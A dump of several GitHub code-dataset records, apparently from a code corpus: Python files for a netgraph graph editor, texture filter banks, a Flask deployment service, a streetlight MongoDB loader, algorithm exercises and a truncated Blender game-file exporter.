AnnotateOnClick\n if artist in self.artist_to_annotation:\n del self.artist_to_annotation[artist]\n # 4) BaseGraph\n self.nodes.remove(node)\n del self.node_positions[node]\n del self.node_artists[node]\n if hasattr(self, 'node_label_artists'):\n if node in self.node_label_artists:\n self.node_label_artists[node].remove()\n del self.node_label_artists[node]\n if hasattr(self, 'node_label_offset'):\n if node in self.node_label_offset:\n del self.node_label_offset[node]\n artist.remove()\n\n\n def _add_edge(self, edge, edge_properties=None):\n # TODO: support non-straight edge paths when initializing the new edge.\n # Currently, we circumvent the problem by calling _update_edges after edge creation.\n source, target = edge\n path = np.array([self.node_positions[source], self.node_positions[target]])\n\n # create artist\n if not edge_properties:\n edge_properties = self._last_selected_edge_properties\n\n if (target, source) in self.edges:\n shape = 'right'\n self.edge_artists[(target, source)].shape = 'right'\n self.edge_artists[(target, source)]._update_path()\n else:\n shape = 'full'\n\n artist = EdgeArtist(midline=path, shape=shape, **edge_properties)\n\n self._reverse_edge_artists[artist] = edge\n\n # update data structures in parent classes\n # 1) InteractiveGraph\n # 2a) DraggableGraph\n # None\n # 2b) EmphasizeOnHoverGraph\n self.artist_to_key[artist] = edge\n # 2c) AnnotateOnClickGraph\n # None\n # 3a) Graph\n # None\n # 3b) ClickableArtists, SelectableArtists, DraggableArtists\n self._clickable_artists.append(artist)\n self._selectable_artists.append(artist)\n self._base_linewidth[artist] = artist._lw_data\n self._base_edgecolor[artist] = artist.get_edgecolor()\n # 3c) EmphasizeOnHover\n self.emphasizeable_artists.append(artist)\n self._base_alpha[artist] = artist.get_alpha()\n # 3d) AnnotateOnClick\n # None\n # 4) BaseGraph\n self.edges.append(edge)\n self.edge_paths[edge] = path\n self.edge_artists[edge] = artist\n self.ax.add_patch(artist)\n\n\n def _delete_edges(self):\n edges = [self._reverse_edge_artists[artist] for artist in self._selected_artists if isinstance(artist, EdgeArtist)]\n for edge in edges:\n self._delete_edge(edge)\n\n\n def _delete_edge(self, edge):\n artist = self.edge_artists[edge]\n del 
self._reverse_edge_artists[artist]\n\n source, target = edge\n if (target, source) in self.edges:\n self.edge_artists[(target, source)].shape = 'full'\n self.edge_artists[(target, source)]._update_path()\n\n # update data structures in parent classes\n # 1) InteractiveGraph\n # None\n # 2a) DraggableGraph\n # None\n # 2b) EmphasizeOnHoverGraph\n del self.artist_to_key[artist]\n # 2c) AnnotateOnClickGraph\n if artist in self.annotated_artists:\n self._remove_annotation(artist)\n # 3a) Graph\n # None\n # 3b) ClickableArtists, SelectableArtists, DraggableArtists\n self._clickable_artists.remove(artist)\n self._selectable_artists.remove(artist)\n try:\n self._selected_artists.remove(artist)\n except ValueError:\n pass\n del self._base_linewidth[artist]\n del self._base_edgecolor[artist]\n # 3c) EmphasizeOnHover\n self.emphasizeable_artists.remove(artist)\n try:\n self.deemphasized_artists.remove(artist)\n except ValueError:\n pass\n del self._base_alpha[artist]\n # 3d) AnnotateOnClick\n if artist in self.artist_to_annotation:\n del self.artist_to_annotation[artist]\n # 4) BaseGraph\n self.edges.remove(edge)\n del self.edge_paths[edge]\n del self.edge_artists[edge]\n if hasattr(self, 'edge_label_artists'):\n if edge in self.edge_label_artists:\n self.edge_label_artists[edge].remove()\n del self.edge_label_artists[edge]\n # TODO remove edge data\n artist.remove()\n\n\n def _reverse_edges(self):\n edges = [self._reverse_edge_artists[artist] for artist in self._selected_artists if isinstance(artist, EdgeArtist)]\n edge_properties = [self._extract_edge_properties(self.edge_artists[edge]) for edge in edges]\n\n # delete old edges;\n # note this step has to be completed before creating new edges,\n # as bi-directional edges can pose a problem otherwise\n for edge in edges:\n self._delete_edge(edge)\n\n for edge, properties in zip(edges, edge_properties):\n self._add_edge(edge[::-1], properties)\n\n\nclass EditableGraph(MutableGraph):\n \"\"\"Extends `InteractiveGraph` to support adding, deleting, and editing graph elements interactively.\n\n a) Addition and removal of nodes and edges:\n\n - Double clicking on two nodes successively will create an edge between them.\n - Pressing 'insert' or '+' will add a new node to the graph.\n - Pressing 'delete' or '-' will remove selected nodes and edges.\n - Pressing '@' will reverse the direction of selected edges.\n\n b) Creation and editing of labels and annotations:\n\n - To create or edit a node or edge label, select the node (or edge) artist, press the 'enter' key, and type.\n - To create or edit an annotation, select the node (or edge) artist, press 'alt'+'enter', and type.\n - Terminate either action by pressing 'enter' or 'alt'+'enter' a second time.\n\n Notes\n -----\n When adding a new node, the properties of the last selected node will be used to style the node artist.\n Ditto for edges. 
If no node or edge has been previously selected the first created node or edge artist will be used.\n\n See also\n --------\n InteractiveGraph\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # initiate node and edge label data structures if they don't exist\n if not hasattr(self, 'node_label_artists'):\n node_labels = {node : '' for node in self.nodes}\n self.node_label_fontdict = self._initialize_node_label_fontdict(\n kwargs.get('node_label_fontdict'), node_labels, kwargs.get('node_label_offset', (0., 0.)))\n self.node_label_offset, self._recompute_node_label_offsets =\\\n self._initialize_node_label_offset(node_labels, kwargs.get('node_label_offset', (0., 0.)))\n if self._recompute_node_label_offsets:\n self._update_node_label_offsets()\n self.node_label_artists = dict()\n self.draw_node_labels(node_labels, self.node_label_fontdict)\n\n if not hasattr(self, 'edge_label_artists'):\n edge_labels = {edge : '' for edge in self.edges}\n self.edge_label_fontdict = self._initialize_edge_label_fontdict(kwargs.get('edge_label_fontdict'))\n self.edge_label_position = kwargs.get('edge_label_position', 0.5)\n self.edge_label_rotate = kwargs.get('edge_label_rotate', True)\n self.edge_label_artists = dict()\n self.draw_edge_labels(edge_labels, self.edge_label_position,\n self.edge_label_rotate, self.edge_label_fontdict)\n\n self._currently_writing_labels = False\n self._currently_writing_annotations = False\n\n\n def _on_key_press(self, event):\n if event.key == 'enter':\n if self._currently_writing_labels or self._currently_writing_annotations:\n self._terminate_writing()\n else:\n self._initiate_writing_labels()\n elif event.key == 'alt+enter':\n if self._currently_writing_annotations or self._currently_writing_labels:\n self._terminate_writing()\n else:\n self._initiate_writing_annotations()\n else:\n if self._currently_writing_labels:\n self._edit_labels(event.key)\n elif self._currently_writing_annotations:\n self._edit_annotations(event.key)\n else:\n super()._on_key_press(event)\n\n\n def _terminate_writing(self):\n self._currently_writing_labels = False\n self._currently_writing_annotations = False\n self.fig.canvas.manager.key_press_handler_id \\\n = self.fig.canvas.mpl_connect('key_press_event', self.fig.canvas.manager.key_press)\n print('Finished writing.')\n\n\n def _initiate_writing_labels(self):\n self._currently_writing_labels = True\n self.fig.canvas.mpl_disconnect(self.fig.canvas.manager.key_press_handler_id)\n print('Initiated writing label(s).')\n\n\n def _initiate_writing_annotations(self):\n self._currently_writing_annotations = True\n self.fig.canvas.mpl_disconnect(self.fig.canvas.manager.key_press_handler_id)\n print('Initiated writing annotations(s).')\n\n\n def _edit_labels(self, key):\n for artist in self._selected_artists:\n if isinstance(artist, NodeArtist):\n self._edit_node_label(artist, key)\n elif isinstance(artist, EdgeArtist):\n self._edit_edge_label(artist, key)\n\n\n def _edit_node_label(self, artist, key):\n node = self.artist_to_key[artist]\n if node not in self.node_label_artists:\n # re-use a random offset to position node label;\n # we will improve the placement by updating all node label offsets\n self.node_label_offset[node] = next(iter(self.node_label_offset.values()))\n self._update_node_label_offsets()\n self.draw_node_labels({node : ''}, self.node_label_fontdict)\n\n self._edit_text_object(self.node_label_artists[node], key)\n\n\n def _edit_edge_label(self, artist, key):\n edge = self.artist_to_key[artist]\n if 
edge not in self.edge_label_artists:\n self.draw_edge_labels({edge : ''}, self.edge_label_position,\n self.edge_label_rotate, self.edge_label_fontdict)\n\n self._edit_text_object(self.edge_label_artists[edge], key)\n\n\n def _edit_annotations(self, key):\n for artist in self._selected_artists:\n if artist not in self.annotated_artists:\n if artist not in self.artist_to_annotation:\n self.artist_to_annotation[artist] = ''\n self.annotated_artists.add(artist)\n placement = self._get_annotation_placement(artist)\n self._add_annotation(artist, *placement)\n\n self._edit_text_object(self.artist_to_text_object[artist], key)\n self.artist_to_annotation[artist] = self.artist_to_text_object[artist].get_text()\n\n\n def _edit_text_object(self, text_object, key):\n if len(key) == 1:\n text_object.set_text(text_object.get_text() + key)\n elif key == 'backspace':\n text_object.set_text(text_object.get_text()[:-1])\n self.fig.canvas.draw_idle()\n","repo_name":"paulbrodersen/netgraph","sub_path":"netgraph/_interactive_variants.py","file_name":"_interactive_variants.py","file_ext":"py","file_size_in_byte":22592,"program_lang":"python","lang":"en","doc_type":"code","stars":586,"dataset":"github-code","pt":"53"} +{"seq_id":"31150335822","text":"'''\n프로그래머스 - 디스크 컨트롤러\n'''\n\nimport heapq\n\ndef solution(jobs):\n answer = 0\n time = 0\n start = -1\n count = 0\n h = []\n while count < len(jobs):\n for job in jobs:\n if start < job[0] <= time:\n heapq.heappush(h, [job[1], job[0]])\n \n if h:\n cur = heapq.heappop(h) \n start = time\n time += cur[0]\n answer += (time - cur[1])\n count += 1\n else:\n time += 1\n\n return int(answer / len(jobs))\n\n","repo_name":"JIKMAN/Algorithm","sub_path":"coding_test/programmers-디스크 컨트롤러.py","file_name":"programmers-디스크 컨트롤러.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16756371844","text":"import cv2\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport itertools\n\n#a function for plotting filters\ndef plot_grid_images(images, rows, cols, name, scale=1 ):\n fig, axes = plt.subplots(rows, cols, figsize=(cols*scale,rows*scale), subplot_kw=dict(xticks=[], yticks=[]))\n\n for i, image in enumerate(images):\n axes[i//cols, i%cols].imshow(image, cmap='gray')\n #plt.show()\n fig.savefig(name)\n#first derivatives of Gaussians\ndef gaussian1d(sigma, mean, x, ord):\n x = np.array(x)\n x_ = x - mean\n var = sigma**2\n g1 = (1/np.sqrt(2*np.pi*var))*(np.exp((-1*x_*x_)/(2*var)))\n g = [g1, -g1*((x_)/(var)), g1*(((x_*x_) - var)/(var**2))][ord]\n return g\n#second derivatives of Gaussians\ndef gaussian2d(sup, scales):\n var = scales * scales\n shape = (sup,sup)\n n,m = [(i - 1)/2 for i in shape]\n x,y = np.ogrid[-m:m+1,-n:n+1]\n g = (1/np.sqrt(2*np.pi*var))*np.exp( -(x*x + y*y) / (2*var) )\n return g\n#Laplacian of Gaussian\ndef log2d(sup, scales):\n var = scales * scales\n shape = (sup,sup)\n n,m = [(i - 1)/2 for i in shape]\n x,y = np.ogrid[-m:m+1,-n:n+1]\n g = (1/np.sqrt(2*np.pi*var))*np.exp( -(x*x + y*y) / (2*var) )\n h = g*((x*x + y*y) - var)/(var**2)\n return h\n\ndef makefilter(scale, phasex, phasey, pts, sup):\n gx = gaussian1d(3*scale, 0, pts[0,...], phasex)\n gy = gaussian1d(scale, 0, pts[1,...], phasey)\n image = np.reshape(gx*gy,(sup,sup))\n return image\n\ndef makeLMfilters():\n sup = 49\n scalex = np.sqrt(2) * np.array([1,2,3])\n norient = 6\n nrotinv = 12\n\n nbar = len(scalex)*norient\n nedge = len(scalex)*norient\n nf = nbar+nedge+nrotinv\n 
hsup = (sup - 1)/2\n\n x = [np.arange(-hsup,hsup+1)]\n y = [np.arange(-hsup,hsup+1)]\n\n [x,y] = np.meshgrid(x,y)\n\n orgpts = [x.flatten(), y.flatten()]\n orgpts = np.array(orgpts)\n\n edge, bar, spot = [], [], []\n for scale in range(len(scalex)):\n for orient in range(norient):\n angle = (np.pi * orient)/norient\n c = np.cos(angle)\n s = np.sin(angle)\n rotpts = [[c+0,-s+0],[s+0,c+0]]\n rotpts = np.array(rotpts)\n rotpts = np.dot(rotpts,orgpts)\n bar.append(makefilter(scalex[scale], 0, 1, rotpts, sup))\n edge.append(makefilter(scalex[scale], 0, 2, rotpts, sup))\n\n scales = np.sqrt(2) * np.array([1,2,3,4])\n\n for i in range(len(scales)):\n spot.append(gaussian2d(sup, scales[i]))\n\n for i in range(len(scales)):\n spot.append(log2d(sup, scales[i]))\n\n for i in range(len(scales)):\n spot.append(log2d(sup, 3*scales[i]))\n\n return edge, bar, spot\n\nfilterbanks = {}\nfilterbanks['LM'] = [{'kernel': filter} for filter in itertools.chain(*makeLMfilters())]\n\nplot_grid_images(images=[cv2.resize(filter['kernel'], (100, 100)) for filter in filterbanks['LM']],\n rows=4, cols=12 , name = 'LM.png')\n\n\n\ndef makeRFSfilters(radius=24, sigmas=[1, 2, 4], n_orientations=6):\n \n def make_gaussian_filter(x, sigma, order=0):\n if order > 2:\n raise ValueError(\"Only orders up to 2 are supported\")\n # compute unnormalized Gaussian response\n response = np.exp(-x ** 2 / (2. * sigma ** 2))\n if order == 1:\n response = -response * x\n elif order == 2:\n response = response * (x ** 2 - sigma ** 2)\n # normalize\n response /= np.abs(response).sum()\n return response\n\n def makefilter(scale, phasey, pts, sup):\n gx = make_gaussian_filter(pts[0, :], sigma=3 * scale)\n gy = make_gaussian_filter(pts[1, :], sigma=scale, order=phasey)\n f = (gx * gy).reshape(sup, sup)\n # normalize\n f /= np.abs(f).sum()\n return f\n\n support = 2 * radius + 1\n x, y = np.mgrid[-radius:radius + 1, radius:-radius - 1:-1]\n orgpts = np.vstack([x.ravel(), y.ravel()])\n\n rot, edge, bar = [], [], []\n for sigma in sigmas:\n for orient in range(n_orientations):\n # Not 2pi as filters have symmetry\n angle = np.pi * orient / n_orientations\n c, s = np.cos(angle), np.sin(angle)\n rotpts = np.dot(np.array([[c, -s], [s, c]]), orgpts)\n edge.append(makefilter(sigma, 1, rotpts, support))\n bar.append(makefilter(sigma, 2, rotpts, support))\n length = np.sqrt(x ** 2 + y ** 2)\n rot.append(make_gaussian_filter(length, sigma=10))\n rot.append(make_gaussian_filter(length, sigma=10, order=2))\n\n # # reshape rot and edge\n # edge = np.asarray(edge)\n # edge = edge.reshape(len(sigmas), n_orientations, support, support)\n # bar = np.asarray(bar).reshape(edge.shape)\n # rot = np.asarray(rot)[:, np.newaxis, :, :]\n return edge, bar, rot\n\nfilterbanks['RFS'] = [{'kernel': filter} for filter in itertools.chain(*makeRFSfilters())]\n\nplot_grid_images(images=[cv2.resize(filter['kernel'], (100, 100)) for filter in filterbanks['RFS']],\n rows=4, cols=10 , name='RFS.png')\n\n\ndef makeSfilters():\n params = [(2,1),(4,1),(4,2),(6,1),(6,2),(6,3),(8,1),\n (8,2),(8,3),(10,1),(10,2),(10,3),(10,4)]\n filters = [makefilter(49, *param) for param in params]\n return filters\n\ndef makefilter(sup,sigma,tau):\n hsup = (sup - 1)/2\n x = [np.arange(-hsup,hsup+1)]\n y = [np.arange(-hsup,hsup+1)]\n [x,y] = np.meshgrid(x,y)\n r=np.sqrt(x*x+y*y)\n f=np.cos(r*(np.pi*tau/sigma))*np.exp(-(r*r)/(2*sigma*sigma))\n f=f-np.mean(f[:])\n f=f/np.sum(np.abs(f[:]))\n return f\n\nfilterbanks['S'] = [{'kernel': filter} for filter in 
makeSfilters()]\n\nplot_grid_images(images=[cv2.resize(filter['kernel'], (100, 100)) for filter in filterbanks['S']],\n rows=4, cols=4 , name='S.png')","repo_name":"soroush-mim/AUT-Machine-Vision","sub_path":"hw3/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1258679221","text":"import os\nfrom PIL import Image\n\nif __name__ == '__main__':\n mode1_dir = '/mnt/train_rotate180/'\n mode2_dir = '/mnt/valid_rotate180/'\n #mode3_dir = '/home/chen-ubuntu/Desktop/checks_dataset/valid_crop_mode3'\n\n dirlist = [mode1_dir, mode2_dir]#, mode3_dir]\n\n merge_dir = '/mnt/tvmerge_rotate180/'\n\n for i in range(2):\n img_dir = os.path.join(dirlist[i], 'images')\n img_files = os.listdir(img_dir)\n for img_file in sorted(img_files):\n img_path = os.path.join(img_dir, img_file)\n img = Image.open(img_path)\n new_path = os.path.join(merge_dir, 'images', img_file)\n print(new_path)\n img.save(new_path)\n\n for i in range(2):\n txt_dir = os.path.join(dirlist[i], 'labels')\n txt_files = os.listdir(txt_dir)\n for txt_file in sorted(txt_files):\n txt_path = os.path.join(txt_dir, txt_file)\n #img = Image.open(img_path)\n new_path = os.path.join(merge_dir, 'labels', txt_file)\n print(new_path)\n #img.save(new_path)\n with open(new_path, 'w') as writer:\n with open(txt_path, 'r') as lines:\n lines = lines.readlines()\n for l, line in enumerate(lines):\n writer.write(line)\n writer.close()\n","repo_name":"SunnyangBoy/checks_recognize_v2","sub_path":"crop_merge.py","file_name":"crop_merge.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39335777126","text":"# 二分查找算法\ndef binary_search(col, item):\n low = 0\n high = len(col) - 1\n while low <= high:\n mid = (low + high) // 2\n guss = list[mid]\n if guss > item:\n high = mid - 1\n elif guss == item:\n return mid\n elif guss < item:\n low = mid + 1\n\n return None\n","repo_name":"LionelOrange/pyexample","sub_path":"example1/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39291580471","text":"from flask import Flask, jsonify, request \r\nfrom flask_api import status\r\nfrom flask_limiter import Limiter\r\nfrom flask_limiter.util import get_remote_address\r\nfrom utils import *\r\nfrom settings import *\r\n\r\napp = Flask(__name__)\r\nlimiter = Limiter(\r\n get_remote_address,\r\n app=app,\r\n default_limits=[\"1/second\"]\r\n)\r\n\r\ninit_db()\r\n\r\n@app.route(\"/deploy\", methods=['GET'])\r\ndef deploy():\r\n SERVICE_PARAM_KEY = \"service\"\r\n \r\n req_param = request.args.to_dict()\r\n param_verify_result = verify_parameters([SERVICE_PARAM_KEY], req_param.keys())\r\n if param_verify_result != None:\r\n return param_verify_result\r\n \r\n service_name = req_param[SERVICE_PARAM_KEY]\r\n \r\n # Connect to DB \r\n connect = sqlite3.connect(DATABASE, isolation_level=None)\r\n cursor = connect.cursor()\r\n \r\n # Get the service info\r\n cursor.execute(\"SELECT repo, deployed_commit, port_info, volumes FROM service WHERE name=?\", (service_name,))\r\n s = cursor.fetchone()\r\n if s == None:\r\n return {RES_STATUS_KEY: status.HTTP_404_NOT_FOUND, RES_ERROR_MESSAGE: \"service not exists\"}, status.HTTP_404_NOT_FOUND\r\n repo, deployed_commit, port_info, volume_string = s\r\n \r\n # Verify volume String\r\n 
volumes = parse_volumes(volume_string)\r\n volumes_verify_result = verify_volumes(volumes)\r\n if volumes_verify_result != None:\r\n return volumes_verify_result\r\n volume_arg = map_volume_to_local_dir(service_name, volumes)\r\n \r\n # Clone or pull repo\r\n subprocess.call([\"bash\", \"./update_repo.sh\", CWD, service_name, repo])\r\n \r\n # Parse commit id\r\n last_commit_id = subprocess.run([\"git\", \"log\", '--format=\"%H\"', \"-n\", \"1\"], capture_output=True, cwd=service_name).stdout.decode()\r\n \r\n # Verify commit\r\n if last_commit_id == deployed_commit:\r\n return {RES_STATUS_KEY: status.HTTP_400_BAD_REQUEST, RES_ERROR_MESSAGE: \"{}@{} already deployed\".format(service_name, deployed_commit)}, status.HTTP_400_BAD_REQUEST \r\n \r\n # Update latest commit \r\n cursor.execute(\"UPDATE service SET deployed_commit=? WHERE name=?\", (last_commit_id, service_name))\r\n connect.commit()\r\n \r\n # Deploy as a docker container (subprocess)\r\n subprocess.call([\"bash\", \"./deploy_repo.sh\", CWD, service_name, port_info, volume_arg])\r\n \r\n res = {}\r\n res[RES_STATUS_KEY] = status.HTTP_200_OK\r\n res[RES_DATA_KEY] = \"Deployed the service {} successfully!\".format(service_name)\r\n return res, status.HTTP_200_OK\r\n\r\n\r\n\r\n# Enroll project\r\n@app.route(\"/enroll\", methods=['POST'])\r\ndef enroll():\r\n ACCESS_TOKEN_HEADER_KEY = \"Access-Token\"\r\n SERVICE_NAME_PARAM_KEY = \"service\"\r\n SERVICE_REPO_PARAM_KEY = \"repo\"\r\n SERVICE_PORT_INFO_PARAM_KEY = \"port_info\"\r\n SERVICE_VOLUMES_PARAM_KEY = \"volumes\"\r\n \r\n req_header = request.headers\r\n req_param = request.form\r\n\r\n # Verification\r\n header_verify_result = verify_parameters([ACCESS_TOKEN_HEADER_KEY], req_header.keys(), is_header=True)\r\n if header_verify_result != None:\r\n return header_verify_result\r\n if req_header[ACCESS_TOKEN_HEADER_KEY] != ACCESS_TOKEN:\r\n return {RES_STATUS_KEY: status.HTTP_403_FORBIDDEN, RES_ERROR_MESSAGE: \"invalid access token\"}, status.HTTP_403_FORBIDDEN\r\n param_verify_result = verify_parameters([SERVICE_NAME_PARAM_KEY, SERVICE_REPO_PARAM_KEY, SERVICE_PORT_INFO_PARAM_KEY, SERVICE_VOLUMES_PARAM_KEY], req_param.keys())\r\n if param_verify_result != None:\r\n return param_verify_result\r\n \r\n service = req_param[SERVICE_NAME_PARAM_KEY]\r\n repo = req_param[SERVICE_REPO_PARAM_KEY]\r\n port_info = req_param[SERVICE_PORT_INFO_PARAM_KEY]\r\n volumes = req_param[SERVICE_VOLUMES_PARAM_KEY]\r\n \r\n # Connect to DB\r\n connect = sqlite3.connect(DATABASE, isolation_level=None)\r\n cursor = connect.cursor()\r\n \r\n # INSERT the service into DB\r\n cursor.execute('SELECT * FROM service WHERE name=?', (service,))\r\n s = cursor.fetchall()\r\n if(len(s)==0): # New Service\r\n cursor.execute(\"INSERT INTO service(name, repo, deployed_commit, port_info, volumes) VALUES (?, ?, ?, ?, ?)\", (service, repo, \"NO_DEPLOYMENT_YET\", port_info, volumes))\r\n cursor.execute('UPDATE service SET repo=? 
WHERE name=?', (repo, service,))\r\n \r\n res = {}\r\n res[RES_STATUS_KEY] = status.HTTP_200_OK\r\n res[RES_DATA_KEY] = \"The service {} was successfully created\".format(service)\r\n return jsonify(res)\r\n\r\n# app.run(host=\"localhost\",port=5050)","repo_name":"HeXA-UNIST/automated-deployment","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41124785842","text":"class Solution(object):\n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n\n freq = {}\n for numbers in nums:\n if numbers in freq:\n freq[numbers] +=1\n else:\n freq[numbers] =1\n\n for k,v in freq.items():\n if v ==1:\n return k\n\n # Below is a better solution using bitwise XOR\n\n # res=0\n # for num in nums:\n # res = num^res\n # print(res)\n # return res\n","repo_name":"AkshayPunhani/leetcode","sub_path":"singleNumber.py","file_name":"singleNumber.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26133886633","text":"import pandas\nimport pymongo\nimport numpy as np\n\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n\ndb = myclient[\"street-lights-db\"]\nstreetlights = db[\"streetlights\"]\nloggedInUsers = db[\"LoggedIn-Users\"]\nadministration_ids = db[\"administration-details\"]\nccms = db[\"ccms\"]\nreports = db[\"reports\"]\nresolved_report = db['resolved-reports']\nunique_token = db['unique-token']\n\nstreetlights.drop()\nloggedInUsers.drop()\nadministration_ids.drop()\nreports.drop()\nresolved_report.drop()\nccms.drop()\nunique_token.drop()\n\n\nfor x in streetlights.find()[:10]:\n print(x)\nprint(sum([1 for x in streetlights.find()]))\n\n# csv_files = ['./data/Najafgarh-1.csv', './data/Najafgarh-2.csv', './data/South-1.csv', './data/South-2.csv', './data/West-1.csv', './data/West-2.csv', './data/West-3.csv', './data/West-4.csv','./data/Central-1.csv', './data/Central-2.csv', './data_new/Najafgarh-1.csv', './data_new/Najafgarh-2.csv', './data_new/South-1.csv', './data_new/South-2.csv', './data_new/West-1.csv', './data_new/West-2.csv', './data_new/West-3.csv', './data_new/West-4.csv','./data_new/Central-1.csv', './data_new/Central-2.csv', './data_new/West-12.csv','./data_new/West-22.csv', './data/Added Lights.csv'] \ncsv_files = ['./data/Added Lights.csv']\nexcel_files = ['./data_final/South Zone Installation with unique pole number 02-05-2022.xlsx', './data_final/WZ Data with Unique Pole Number.xlsx', './data_final/CZ Data with Unique Pole Number Cleaned.xlsx', './data_final/NZ Data with Unique Pole Number Cleaned.xlsx']\n\n#excel_files = ['./data_final/South Zone Installation with unique pole number 02-05-2022.xlsx']\n\nlampposts = []\nstreetlights_dfs = []\n\ndeletedLights = pandas.read_csv('./data/Deleted Lights.csv')\n\n\nfor file in csv_files:\n streetlights_dfs.append(pandas.read_csv(file, dtype={'Unique Pole No.':str, 'Wattage':str, 'Latitude':np.float64, 'Longitude':np.float64}))\n\nfor file in excel_files:\n dfs = pandas.read_excel(file, sheet_name = None, dtype={'Unique Pole No.':str, 'Wattage':str, 'Latitude':np.float64, 'Longitude':np.float64}) # read all sheets\n for sheet in dfs.keys():\n streetlights_dfs.append(dfs[sheet])\n\n\ndf_final = pandas.concat(streetlights_dfs)\ndf_final_latlng = df_final[['Longitude', 'Latitude', 'CCMS NO', 'Zone', 'Type of Light', 'No. Of Lights', 'Ward No.' 
, 'Wattage', 'Unique Pole No.']]\ndf_final_latlng = df_final_latlng.drop_duplicates(keep= 'last')\ndf_final_latlng = df_final_latlng.dropna(subset=['Unique Pole No.','CCMS NO','Latitude','Longitude'])\n\n\ndf_final_latlng = pandas.concat([df_final_latlng, deletedLights, deletedLights]).drop_duplicates(keep=False)\ndf_final_latlng = df_final_latlng.dropna(subset=['Unique Pole No.','CCMS NO','Latitude','Longitude'])\n\ndf_final_latlng = df_final_latlng.fillna('')\n\ntemp = df_final_latlng.values.tolist()\ntemp = map(lambda x : {'lat':x[1], 'lng':x[0], 'CCMS_no': x[2], 'zone': x[3], 'Type of Light':x[4], 'No. Of Lights':x[5], 'Ward No.':x[6], 'wattage': x[7],'Connected Load':-1, 'Actual Load':-1, '_id':x[8]}, temp)\nlampposts += temp\n\nstreetlights.insert_many(lampposts)\n\nprint(\"Total lights uploaded: \", sum([1 for x in streetlights.find()]))\n\nfor x in streetlights.find()[:10]:\n print(x)\n\n# loading admin creadentials\nadmin_details = pandas.read_csv('./admin_credentials/admin_details.csv', dtype={'agency':str,'Ward_No':str, 'zone':str})\nadmin_details = admin_details.dropna(subset=['Email'])\n\nadmin_details = admin_details.fillna('')\ntemp = admin_details.values.tolist()\ntemp = map(lambda x : {'Name':x[0], 'Email':x[1], 'agency': x[2], 'Ward_No': x[3], 'zone':x[4]}, temp)\nadministration_ids.insert_many(temp)\n\nfor x in administration_ids.find():\n print(x)\n","repo_name":"aryan10behal/Roshni","sub_path":"street-lights-db/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74352013929","text":"import bpy\nimport struct\nimport time\n\nbdata = bpy.data\ncollec = bpy.context.collection\n\ntimeStart = time.time() # start timer\nprint(f\"TIME STARTED {time.localtime().tm_hour}:{time.localtime().tm_min}\")\n\n\nfilePath = \"G:/Emulated/Playstation 2/Games/SSX Tricky/data/models/\"\nfileName = \"snow\"\nfileSuff = \"ltg\"\n\nscaleMult = 100\n\n\n\ndef export_bounds():\n\n f = open(filePath+\"/\"+fileName+\".\"+fileSuff, 'r+b')\n\n en = \"<\"\n\n f.seek(0x3, 0)\n (enByte,) = struct.unpack('B', f.read(1))\n\n if enByte == 1:\n en = \">\"\n\n pack_write_bounds(f\"{fileName}_bbox.world\", f, en) # export world bounds\n\n f.seek(0x2C, 0)\n\n (offsetCount ,) = struct.unpack(en+'I', f.read(4))\n (offsetListCount,) = struct.unpack(en+'I', f.read(4))\n\n f.seek(0x48, 0)\n\n (gridBoxCount ,) = struct.unpack(en+'I', f.read(4)) # = 16\n (offsetListOffset,) = struct.unpack(en+'I', f.read(4)) # = 84\n (offsetListEnd ,) = struct.unpack(en+'I', f.read(4))\n\n f.seek(offsetListOffset, 0)\n\n offsetListContainer = []\n for i in range(offsetListCount):\n\n offsetTuple = struct.unpack(en+'I'*offsetCount, f.read(4*offsetCount))\n offsetListContainer.append(offsetTuple)\n\n\n sortedOffsetList = clear_list(offsetListContainer)\n\n\n for i in range(len(sortedOffsetList)):\n\n f.seek(sortedOffsetList[i], 0)\n\n objName = f\"{fileName}_bbox.a_{i}\"\n\n pack_write_bounds(objName, f, en)\n\n f.seek(48, 1) # skip extras\n\n print(f\"\\n{objName} Ends:{hex(f.tell())} Values:\\n\")\n\n\n for j in range(gridBoxCount):\n\n obj2Name = f\"{fileName}_bbox.b_{i}_{j}\"\n\n pack_write_bounds(obj2Name, f, en)\n\n f.seek(40, 1) # skip extras\n \n print(f\"{obj2Name} Ends:{hex(f.tell())} Values:\\n\")\n \n \n timeEnd = time.time()\n print(f\"\\nFINISHED ({time.localtime().tm_hour}:{time.localtime().tm_min})\\nTime taken {round(timeEnd-timeStart, 4)}s\")\n\n f.close()\n\n\ndef midpoint2(a, b):\n 
